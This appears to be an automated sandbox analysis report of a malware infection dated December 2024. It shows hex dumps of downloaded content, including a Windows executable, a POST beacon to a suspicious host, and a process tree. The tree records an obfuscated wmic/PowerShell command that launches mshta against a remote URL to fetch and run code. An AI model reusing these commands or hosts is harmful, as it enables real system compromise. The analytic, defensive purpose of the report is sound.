                                                                                                              Data Ascii: S^wG}-1ci03ac16ajS91ci03ac16ajS91ci0Tz0e1cLaBY#L}?*QAq7vfG>~_DwY]5W7_7G9u_h1iKo66
                                                                                                              2024-12-16 08:14:17 UTC16384INData Raw: 1c c3 94 46 23 c3 94 78 1d c3 94 38 86 29 05 0c 53 e2 18 a6 54 1a 19 a6 14 30 4c 01 40 14 30 4c 8d ea 3d 91 61 4a 1a c3 94 3c 86 29 8d 46 86 29 f1 46 86 29 71 0c 53 f2 7d 0c 53 0a 8d 0c 53 e2 18 a6 00 00 e5 82 61 6a 54 ef 89 0c 53 d2 18 a6 e4 31 4c 69 34 32 4c 89 37 32 4c 89 63 98 92 ef 63 98 52 68 64 98 12 c7 30 05 00 28 17 0c 53 a3 7a 4f 64 98 92 c6 30 25 8f 61 4a a3 91 61 4a bc 91 61 4a 1c c3 94 7c 1f c3 94 42 23 c3 94 38 86 29 00 40 b9 60 98 1a d5 7b 22 c3 94 34 86 29 79 0c 53 1a 8d 0c 53 e2 8d 0c 53 e2 18 a6 e4 fb 18 a6 14 1a 19 a6 c4 31 4c 01 00 ca 05 c3 d4 a8 de 13 19 a6 a4 31 4c c9 63 98 d2 68 64 98 12 6f 64 98 12 c7 30 25 df c7 30 a5 d0 c8 30 25 8e 61 0a 00 50 2e f6 a9 aa 58 fe d5 cf 6f 38 fb e4 5b 3e 7e 64 a1 1f 4b 1e 0c 53 8a 18 a6 c4 31 4c 69
                                                                                                              Data Ascii: F#x8)ST0L@0L=aJ<)F)F)qS}SSajTS1Li42L72LccRhd0(SzOd0%aJaJaJ|B#8)@`{"4)ySSS1L1Lchdod0%00%aP.Xo8[>~dKS1Li
                                                                                                              2024-12-16 08:14:17 UTC16384INData Raw: 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92
                                                                                                              Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                                              2024-12-16 08:14:17 UTC16384INData Raw: 01 db e9 ef 1a 09 02 38 16 7d 56 7e ea fe f4 8f 99 a5 71 c0 bf 49 25 59 4f c0 34 f4 33 05 0e ac e0 83 6d 68 e4 7e ec 97 a9 68 8e 91 dd a0 05 83 f6 2e 6d 00 cb f7 c8 39 f9 3d ac 20 23 5c 0a a7 d1 f2 5a 8d 8e e7 34 47 40 37 5a 0b b9 a3 89 ce e7 ce 77 bb 21 8c cc 1e 5d 70 24 48 a2 fa bb c8 4f dd 40 ee 63 46 1f d7 2e a0 33 05 5e 5b 0f 4f b0 a1 fe 44 c6 bf 14 74 db 60 f3 5f de 4a 85 ff ee a0 e9 81 55 7f 4d 3b fe 7c 98 ff b7 1e 8b 0a ff 58 d0 3c 04 ab ff 94 8e f6 87 d0 f5 a5 76 ab a1 fb bf 66 44 2a fc bd 80 9f 07 4b ff 9a 76 dc 75 30 ef 6f 3d 96 7f 46 e0 66 c3 e0 3f 7a 0c 2a a8 a0 82 0a ff 93 80 f7 c2 4d ff e8 31 a8 a0 c2 b9 40 b3 ef af 7b a6 52 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54
                                                                                                              Data Ascii: 8}V~qI%YO43mh~h.m9= #\Z4G@7Zw!]p$HO@cF.3^[ODt`_JUM;|X<vfD*Kvu0o=Ff?z*M1@{RATPATPATPATPATPATPATPAT
                                                                                                              2024-12-16 08:14:17 UTC16384INData Raw: 8e f9 4e fa ce f8 ce fb be f6 5d f1 5d f7 73 fe 2c bf de 2f fb 6d 7e cd ef f5 97 f8 7b fb fb fb 07 fb 87 fb 47 f9 c7 fa c7 fb 23 fe b8 7f 92 7f 9a 7f ba 7f 96 7f ae 6b be 7f a1 7f 99 7f 95 7f 9d 7f a3 7f ab 7f b7 bf cd 7f d4 7f c2 7f da 7f ce 7f d1 7f d9 7f ad 88 68 c9 a2 cc 22 7d 91 b9 c8 59 e4 2d 2a 29 ea 5d d4 bf 68 70 51 59 51 79 d1 e8 a2 b1 45 55 45 13 8a ea f2 8f 14 35 14 4d 2b 9a 51 34 a7 68 61 d1 b2 a2 55 45 eb 8a 36 16 6d 29 da 51 b4 b7 a8 ad e8 48 d1 f1 a2 53 45 67 8b 2e 14 5d 2a ba 5a 74 23 20 04 72 02 c6 80 39 60 0f b8 03 fe 40 49 e0 ae 40 df 40 69 60 70 a0 2c 50 1e 18 1d 18 1b a8 0a 4c 08 d4 05 1a 02 53 03 cd 81 96 c0 9c c0 82 c0 92 c0 f2 c0 aa c0 da c0 fa c0 a6 c0 d6 c0 ce c0 fe c0 a1 c0 d1 c0 89 c0 e9 c0 b9 c0 c5 c0 e5 c0 b5 3b c8 1d 99 77
                                                                                                              Data Ascii: N]]s,/m~{G#kh"}Y-*)]hpQYQyEUE5M+Q4haUE6m)QHSEg.]*Zt# r9`@I@@i`p,PLS;w
                                                                                                              2024-12-16 08:14:17 UTC456INData Raw: 30 30 20 6e 0d 0a 30 30 30 30 30 38 31 32 31 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 30 37 31 39 38 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 30 37 38 30 32 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 30 37 38 33 30 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 31 31 30 30 38 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 31 31 30 35 34 20 30 30 30 30 30 20 6e 0d 0a 74 72 61 69 6c 65 72 0d 0a 3c 3c 2f 53 69 7a 65 20 31 34 39 2f 52 6f 6f 74 20 31 20 30 20 52 2f 49 6e 66 6f 20 31 37 20 30 20 52 2f 49 44 5b 3c 32 39 42 32 46 37 30 38 46 33 43 41 38 43 34 46 39 43 36 46 33 38 43 30 35 34 37 42 43 34 33 39 3e 3c 32 39 42 32 46 37 30 38 46 33 43 41 38 43 34 46 39 43 36 46 33 38 43 30 35 34 37 42 43 34 33 39 3e 5d 20 3e 3e 0d 0a 73 74 61 72 74 78 72 65
                                                                                                              Data Ascii: 00 n0000081214 00000 n0000107198 00000 n0000107802 00000 n0000107830 00000 n0000111008 00000 n0000111054 00000 ntrailer<</Size 149/Root 1 0 R/Info 17 0 R/ID[<29B2F708F3CA8C4F9C6F38C0547BC439><29B2F708F3CA8C4F9C6F38C0547BC439>] >>startxre


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.44973662.182.21.1054431344C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-16 08:14:19 UTC53OUTGET /IMAKBWPY.exe HTTP/1.1
                                                                                                              Host: naubeautylus.ch
                                                                                                              2024-12-16 08:14:19 UTC227INHTTP/1.1 200 OK
                                                                                                              Connection: close
                                                                                                              content-type: application/x-msdownload
                                                                                                              last-modified: Sun, 15 Dec 2024 12:36:34 GMT
                                                                                                              accept-ranges: bytes
                                                                                                              content-length: 3082476
                                                                                                              date: Mon, 16 Dec 2024 08:14:19 GMT
                                                                                                              server: LiteSpeed
                                                                                                              2024-12-16 08:14:19 UTC1141INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 21 11 53 05 40 7f 00 05 40 7f 00 05 40 7f 00 b1 dc 8e 00 0c 40 7f 00 b1 dc 8c 00 79 40 7f 00 b1 dc 8d 00 1d 40 7f 00 dc 22 7c 01 16 40 7f 00 dc 22 7b 01 16 40 7f 00 dc 22 7a 01 23 40 7f 00 0c 38 fc 00 00 40 7f 00 0c 38 ec 00 14 40 7f 00 05 40 7e 00 50 41 7f 00 a1 23 7a 01 4e 40 7f 00 a1 23 80 00 04 40 7f 00 05 40 e8 00 07 40 7f 00 a1 23 7d 01 04 40 7f 00 52 69 63 68 05 40 7f
                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A!S@@@@y@@"|@"{@"z#@8@8@@~PA#zN@#@@@#}@Rich@
                                                                                                              2024-12-16 08:14:19 UTC14994INData Raw: 30 a1 04 a0 46 00 33 c5 89 45 fc 53 8b 5d 08 33 c0 56 8b 75 10 57 50 89 45 d0 83 cf ff 89 45 d4 8d 45 d4 50 c7 45 d8 60 b4 44 00 c7 45 dc 78 b4 44 00 c7 45 e0 88 b4 44 00 c7 45 e4 a0 b4 44 00 c7 45 e8 b8 b4 44 00 c7 45 ec d0 b4 44 00 c7 45 f0 e8 b4 44 00 c7 45 f4 00 b5 44 00 c7 45 f8 18 b5 44 00 e8 ea 22 00 00 85 c0 78 1d 6a 00 68 80 00 00 00 6a 03 6a 00 6a 05 68 00 00 00 80 ff 75 d4 ff 15 e4 b0 44 00 8b f8 56 e8 1f 40 00 00 85 c0 74 07 e8 ef 00 00 00 eb 0b 6a 09 8d 45 d8 50 e8 5b 00 00 00 8d 45 d0 50 ff 75 14 56 57 53 e8 6c 40 00 00 8b f0 83 ff ff 74 07 57 ff 15 e0 b0 44 00 83 7d d4 00 74 08 ff 75 d4 e8 f1 44 04 00 85 f6 78 03 8b 75 d0 8b 4d fc 8b c6 5f 5e 33 cd 5b e8 14 cf 02 00 8b e5 5d c2 10 00 55 8b ec 8b 45 08 83 c0 fc 50 ff 15 ec b0 44 00 5d c2 04
                                                                                                              Data Ascii: 0F3ES]3VuWPEEEPE`DExDEDEDEDEDEDEDED"xjhjjjhuDV@tjEP[EPuVWSl@tWD}tuDxuM_^3[]UEPD]
                                                                                                              2024-12-16 08:14:19 UTC16384INData Raw: f4 03 00 00 53 50 e8 89 f4 00 00 8b f0 85 f6 79 0a 68 d4 bc 44 00 e9 0d 01 00 00 8d 45 fc 50 8d 87 f8 00 00 00 50 ff b7 60 01 00 00 8d 87 ac 00 00 00 ff 77 20 50 53 e8 72 4e 00 00 8b f0 85 f6 79 0a 68 e8 bc 44 00 e9 dc 00 00 00 83 7d fc 00 75 13 68 35 00 00 e0 6a 02 e8 9d 0a 00 00 33 f6 e9 c9 00 00 00 83 bf b8 00 00 00 00 74 14 83 7f 20 02 7e 0e 8d 47 34 50 6a 00 ff 75 08 e8 bc 9a 01 00 57 ff 75 08 e8 eb 9e 01 00 8b f0 85 f6 79 0a 68 0c bd 44 00 e9 8d 00 00 00 57 e8 87 31 01 00 8b f0 85 f6 79 07 68 34 bd 44 00 eb 7a 53 ff 77 1c e8 4f ed 00 00 8b f0 85 f6 79 07 68 54 bd 44 00 eb 64 53 8d 87 00 01 00 00 50 e8 c9 bb 00 00 8b f0 85 f6 79 07 68 74 bd 44 00 eb 4a 8b 47 40 33 c9 85 c0 74 21 66 39 08 74 1c 51 50 68 d0 b8 44 00 53 e8 c0 36 00 00 8b f0 85 f6 79 07
                                                                                                              Data Ascii: SPyhDEPP`w PSrNyhD}uh5j3t ~G4PjuWuyhDW1yh4DzSwOyhTDdSPyhtDJG@3t!f9tQPhDS6y
                                                                                                              2024-12-16 08:14:20 UTC16384INData Raw: 50 ff 75 fc 6a 7f ff 15 34 b1 44 00 83 f8 02 74 d3 8b 45 0c 8b 4d 08 83 c0 02 41 89 45 0c 89 4d 08 3b cf 7e d6 8b 45 14 89 18 5f 5e 8b c3 5b 8b e5 5d c2 10 00 55 8b ec 83 ec 28 53 33 db 56 57 6a 02 58 8b f3 89 5d e8 89 5d ec 89 5d f0 89 5d f4 89 5d fc 89 5d d8 89 5d dc 89 5d e0 89 5d e4 89 5d f8 39 45 1c 0f 85 6e 01 00 00 39 45 34 75 55 8d 45 fc 50 8d 45 0c 50 e8 f5 77 01 00 8b f0 85 f6 79 12 68 38 e0 44 00 56 e8 a1 76 03 00 59 59 e9 83 00 00 00 8d 45 f8 50 8d 45 24 50 e8 d0 77 01 00 8b f0 85 f6 79 07 68 58 e0 44 00 eb d9 ff 75 3c ff 75 f8 ff 75 fc ff 75 08 e8 3f fe ff ff e9 0d 01 00 00 83 7d 34 03 0f 85 b2 00 00 00 8d 45 e0 50 8d 45 24 50 e8 87 78 01 00 8b f0 85 f6 0f 88 c2 01 00 00 8d 45 f0 50 8d 45 0c 50 e8 70 78 01 00 8b f0 85 f6 79 6f 81 fe 05 00 02
                                                                                                              Data Ascii: Puj4DtEMAEM;~E_^[]U(S3VWjX]]]]]]]]]]9En9E4uUEPEPwyh8DVvYYEPE$PwyhXDu<uuu?}4EPE$PxEPEPpxyo
                                                                                                              2024-12-16 08:14:20 UTC16384INData Raw: 41 04 53 8b df 85 c0 0f 84 8c 00 00 00 8b c7 89 7d 0c 8b 39 03 f8 8d 45 fc 6a 00 50 83 4f 0c ff ff 75 f4 e8 57 6d 03 00 8b f0 85 f6 78 5e 57 68 9c ca 44 00 ff 75 fc e8 b0 67 03 00 8b f0 85 f6 78 43 8d 47 04 50 68 80 f9 44 00 ff 75 fc e8 99 67 03 00 8b f0 85 f6 78 25 8b 4d fc 85 c9 74 0a 8b 01 51 ff 50 08 83 65 fc 00 8b 45 0c 43 8b 4d 08 83 c0 10 89 45 0c 3b 5d f8 72 96 eb 1b 68 90 f9 44 00 eb 0c 68 a4 ca 44 00 eb 05 68 80 ca 44 00 56 e8 99 36 03 00 59 59 5b 8b 4d f4 85 c9 74 06 8b 01 51 ff 50 08 8b 4d fc 85 c9 74 06 8b 01 51 ff 50 08 5f 8b c6 5e 8b e5 5d c2 08 00 55 8b ec 83 ec 14 53 56 57 33 ff 89 7d fc 89 7d f8 e9 c9 00 00 00 85 f6 0f 88 20 01 00 00 8b 75 08 8b cf 8b 45 fc 89 45 ec 89 4d f4 39 7e 04 76 4c 8b d7 89 7d f0 8b 1e 03 da 83 7b 04 02 75 2b 8b
                                                                                                              Data Ascii: AS}9EjPOuWmx^WhDugxCGPhDugx%MtQPeECME;]rhDhDhDV6YY[MtQPMtQP_^]USVW3}} uEEM9~vL}{u+
                                                                                                              2024-12-16 08:14:20 UTC16384INData Raw: 4b 03 00 43 83 c7 10 3b 9e 98 00 00 00 72 a4 ff b6 94 00 00 00 e8 f5 2e ff ff 33 db 8b 86 bc 00 00 00 85 c0 74 06 50 e8 03 4b 03 00 8b 86 c0 00 00 00 85 c0 74 06 50 e8 f3 4a 03 00 8d 86 b4 00 00 00 50 e8 54 83 01 00 68 a8 01 00 00 53 56 e8 85 ed 01 00 83 c4 0c 5f 5e 5b 5d c2 04 00 55 8b ec 51 51 53 8b 5d 08 8d 45 fc 56 57 50 ff 75 0c 33 f6 ff 73 04 89 75 fc 89 75 f8 e8 31 8f 00 00 8b f8 85 ff 79 12 68 bc 38 45 00 57 e8 9f f6 02 00 8b 75 fc 59 59 eb 45 8d 45 f8 50 53 e8 ec 04 00 00 8b f8 85 ff 79 07 68 a4 37 45 00 eb dc 8b 4d f8 8b 45 0c c7 01 07 00 00 00 89 41 08 8b 45 fc 89 41 0c 8b 45 10 89 75 fc 85 c0 74 02 89 08 8b 4d 14 85 c9 74 10 8b 43 50 48 89 01 85 f6 74 06 56 e8 48 4a 03 00 8b c7 5f 5e 5b 8b e5 5d c2 10 00 55 8b ec 56 57 8b 7d 0c 83 bf 8c 00 00
                                                                                                              Data Ascii: KC;r.3tPKtPJPThSV_^[]UQQS]EVWPu3suu1yh8EWuYYEEPSyh7EMEAEAEutMtCPHtVHJ_^[]UVW}
                                                                                                              2024-12-16 08:14:20 UTC16384INData Raw: 47 45 00 56 e8 27 b7 02 00 59 59 83 7d f8 00 74 08 ff 75 f8 e8 f6 ee fe ff 5f 8b c6 5e 8b e5 5d c2 10 00 55 8b ec 51 83 65 fc 00 8d 45 fc 56 57 8b 7d 08 ff 37 68 30 40 45 00 50 e8 cc d3 fe ff 8b f0 83 c4 0c 85 f6 79 12 68 9c 46 45 00 56 e8 dc b6 02 00 59 59 e9 8b 01 00 00 53 be ff ff 00 80 33 db 81 fb 08 07 00 00 73 53 6a 00 6a 00 6a 03 6a 00 6a 00 68 00 00 00 c0 ff 75 fc ff 15 e4 b0 44 00 89 47 10 83 f8 ff 75 2c ff 15 f4 b0 44 00 8b f0 85 f6 7e 09 0f b7 f6 81 ce 00 00 07 80 81 fe 02 00 07 80 75 05 be b4 05 07 80 6a 64 ff 15 14 b1 44 00 eb 02 33 f6 43 85 f6 78 a5 85 f6 79 1d 56 68 88 02 00 00 68 14 41 45 00 e8 48 ec fe ff ff 75 fc 68 c4 46 45 00 e9 fd 00 00 00 8d 5f 08 53 ff 77 04 ff 77 10 e8 e7 fa ff ff 8b f0 85 f6 79 0d ff 75 fc 68 e4 46 45 00 e9 db 00
                                                                                                              Data Ascii: GEV'YY}tu_^]UQeEVW}7h0@EPyhFEVYYS3sSjjjjjhuDGu,D~ujdD3CxyVhhAEHuhFE_SwwyuhFE
                                                                                                              2024-12-16 08:14:20 UTC16384INData Raw: 00 57 56 68 28 70 45 00 68 60 60 45 00 e8 57 cd 02 00 8b d8 85 db 79 12 68 44 70 45 00 53 e8 0d 77 02 00 59 59 e9 13 01 00 00 39 35 a0 aa 46 00 74 13 57 e8 cd 9f fe ff 8b d8 85 db 79 21 68 78 70 45 00 eb d8 56 ff 35 9c aa 46 00 57 e8 3c 96 fe ff 8b d8 85 db 79 07 68 d0 70 45 00 eb be a1 a0 aa 46 00 39 75 0c 75 05 a1 9c aa 46 00 56 8b 75 10 50 56 e8 15 96 fe ff 8b d8 85 db 79 0a 68 9c 64 45 00 e9 a6 00 00 00 8d 45 f8 50 ff 36 ff 35 9c aa 46 00 e8 43 a1 fe ff 8b d8 85 db 79 0a 68 58 71 45 00 e9 73 ff ff ff 33 db 83 7d f8 02 0f 95 c3 e9 85 00 00 00 a1 98 aa 46 00 85 c0 75 59 8d 45 fc 50 6a 1c e8 e2 a8 fe ff 8b d8 85 db 79 0a 68 a8 64 45 00 e9 ca fe ff ff bf 98 aa 46 00 57 68 08 61 45 00 ff 75 fc e8 62 a1 fe ff 8b d8 85 db 79 0a 68 a8 64 45 00 e9 cf fe ff ff
                                                                                                              Data Ascii: WVh(pEh``EWyhDpESwYY95FtWy!hxpEV5FW<yhpEF9uuFVuPVyhdEEP65FCyhXqEs3}FuYEPjyhdEFWhaEubyhdE
                                                                                                              2024-12-16 08:14:20 UTC16384INData Raw: ff 33 c0 89 45 08 8b 45 f8 85 c0 74 32 8b d3 89 5d f0 52 8d 45 fc 50 ff 77 04 ff 77 0c e8 96 2b 02 00 8b f0 85 f6 78 70 8b 4d 08 8b 55 f0 41 8b 45 f8 83 c2 04 89 4d 08 89 55 f0 3b c8 72 d3 89 45 e8 89 5d ec 8b 45 0c 8d 4d e0 ff 70 04 51 ff 10 8b 4d 10 89 01 83 7d f4 00 74 08 ff 75 f4 e8 cb 8a 02 00 85 db 74 25 8b 45 f8 85 c0 74 18 33 ff 83 3c bb 00 74 0b ff 34 bb e8 b0 8a 02 00 8b 45 f8 47 3b f8 72 ea 53 e8 82 6e fe ff 5f 8b c6 5e 5b 8b e5 5d c2 0c 00 8b 45 08 50 68 30 8c 45 00 56 e8 89 36 02 00 83 c4 0c eb aa 8d 45 e8 c7 45 e0 01 00 00 00 50 8d 45 fc 50 ff 77 04 ff 77 0c e8 97 2a 02 00 8b f0 85 f6 79 0a 68 b4 8b 45 00 e9 8e fe ff ff 8d 45 f4 50 8d 45 fc 50 ff 77 04 ff 77 0c e8 cf 2a 02 00 8b f0 85 f6 79 0a 68 d0 8b 45 00 e9 6b fe ff ff 8b 45 f4 89 45 ec
                                                                                                              Data Ascii: 3EEt2]REPww+xpMUAEMU;rE]EMpQM}tut%Et3<t4EG;rSn_^[]EPh0EV6EEPEPww*yhEEPEPww*yhEkEE
                                                                                                              2024-12-16 08:14:20 UTC16384INData Raw: 51 53 ff 75 08 8d 47 1c 50 e8 77 09 00 00 85 c0 74 59 ff 75 10 8d 45 f4 50 ff 75 fc 53 ff 75 08 ff 15 00 b2 44 00 85 c0 75 41 ff 15 f4 b0 44 00 8b f0 85 f6 7e 0b 0f b7 f6 81 ce 00 00 07 80 85 f6 78 05 be 05 40 00 80 56 68 45 03 00 00 68 a8 a9 45 00 e8 c2 2c fe ff ff 75 0c 68 50 ae 45 00 56 e8 ca f6 01 00 83 c4 0c eb 06 8b 47 08 29 45 f4 89 77 30 85 f6 5f 5e 5b 79 05 83 c8 ff eb 03 8b 45 f4 8b e5 5d c3 55 8b ec 51 8b 0d c0 aa 46 00 64 a1 2c 00 00 00 53 57 33 ff 8b 04 88 89 7d fc 8b 98 04 00 00 00 8b 43 2c 48 83 e8 01 74 38 83 e8 01 74 0c bf 9f 13 07 80 68 1c ae 45 00 eb 72 8b 43 44 2b 43 48 56 8b 75 10 56 ff 75 0c 50 8b 43 40 03 43 48 50 e8 09 30 fe ff 83 c4 10 01 73 48 89 75 fc 5e eb 53 57 8d 45 fc 50 ff 75 10 ff 75 0c ff 73 3c ff 15 3c b1 44 00 85 c0 75
                                                                                                              Data Ascii: QSuGPwtYuEPuSuDuAD~x@VhEhE,uhPEVG)Ew0_^[yE]UQFd,SW3}C,Ht8thErCD+CHVuVuPC@CHP0sHu^SWEPuus<<Du


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.449815104.21.59.814436160C:\Windows\SysWOW64\explorer.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-16 08:15:26 UTC265OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 8
                                                                                                              Host: passworoggre.click
                                                                                                              2024-12-16 08:15:26 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                              Data Ascii: act=life
                                                                                                              2024-12-16 08:15:27 UTC1014INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 16 Dec 2024 08:15:27 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=odou6v3gaa3ac3atot08475eap; expires=Fri, 11-Apr-2025 02:02:06 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dHsmxcOsX8BiJ74ripmZWqioZF3ms3ugiOvaNvGFSi8q9PmF1sMMEN%2FlZB9swwj6srFy9EMM7E%2FnhNTpmpiDiN1jndq4RDeDxK3dAchw1x5GdYLJ3tzPo336I9a9JFCdrYsYIQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f2d39c13aeb0f3b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1459&min_rtt=1444&rtt_var=571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1867007&cwnd=211&unsent_bytes=0&cid=91cf1b7b7cf1fdaa&ts=1079&x=0"
                                                                                                              2024-12-16 08:15:27 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                              Data Ascii: 2ok
                                                                                                              2024-12-16 08:15:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:03:14:05
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend"
                                                                                                              Imagebase:0x7ff7b9f60000
                                                                                                              File size:576'000 bytes
                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:1
                                                                                                              Start time:03:14:05
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:03:14:05
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend
                                                                                                              Imagebase:0x7ff788560000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:03:14:05
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:4
                                                                                                              Start time:03:14:08
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\mshta.exe" https://naubeautylus.ch/Headerfrontend
                                                                                                              Imagebase:0x7ff735b20000
                                                                                                              File size:14'848 bytes
                                                                                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Target ID:5
                                                                                                              Start time:03:14:11
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:6
                                                                                                              Start time:03:14:12
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
